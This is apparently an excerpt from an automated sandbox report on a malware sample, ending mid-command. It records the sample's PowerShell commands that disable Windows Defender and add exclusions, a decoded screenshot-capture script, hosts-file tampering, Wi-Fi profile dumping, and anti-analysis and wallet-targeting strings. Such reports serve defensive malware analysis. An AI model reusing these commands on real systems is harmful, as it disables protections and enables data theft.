                      Source: SecurityHealthSystray.exe, 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: max=scav ptr ] = (usageinit ms, fault tab= top=[...], fp:MarchApril+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930monthGreekAdlamBamumBatakBuhidDograKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilcpu%dfilesimap2imap3imapspop3shostsrouteparsesse41sse42ssse3SHA-1matchrune NRGBAtls: Earlyutf-8%s*%dtext/bad n (at ClassP-224P-256P-384P-521ECDSAx32dbgvmsrvcprl_ccx96dbgdbgclrde4dotwindbgpc-retx64dbgghidraVMwarevmwarexc64zb8VizSM373836ALIONETVM-PCgeorgeGRAFPCT00917test42XC64ZB5Y3y73serverh86LHDDdQrgcQfofoGlK3zMRPgfV1XIZZuXj8vizsmASPNETS7WjufUser01tHiF2TGjBsjbLouiseGGw8NR3W1GJT-ForceattribNumberembedssqliteChromeChedotKometaFenrirCoowonLiebaoDragonCocCocYandexsecretpaypalbanquewalletcryptoexodusatomiccomptecreditpermisnumberbackupconfigVideosinlinefieldsConfigIntentMeteorImpactPolyMCBypassSystem
                      Source: SecurityHealthSystray.exe, 00000016.00000002.1618739153.000001542894B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\WdlA0C4PkO.exe
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\WdlA0C4PkO.exeJump to behavior
                      Bypasses PowerShell execution policy
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABT
                      Encrypted powershell cmdline option found
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}Jump to behavior
                      Modifies Windows Defender protection settings
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
                      Modifies the hosts file
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s C:\Users\user\Desktop\WdlA0C4PkO.exeJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exeJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get UUIDJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get nameJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\WdlA0C4PkO.exeJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get CaptionJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic cpu get NameJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get nameJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get UUIDJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a12sgnvo\a12sgnvo.cmdline"
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41CB.tmp" "c:\Users\user\AppData\Local\Temp\a12sgnvo\CSC12900879E4FA4A8799F1D0272636A686.TMP"
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiabt
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversendJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand 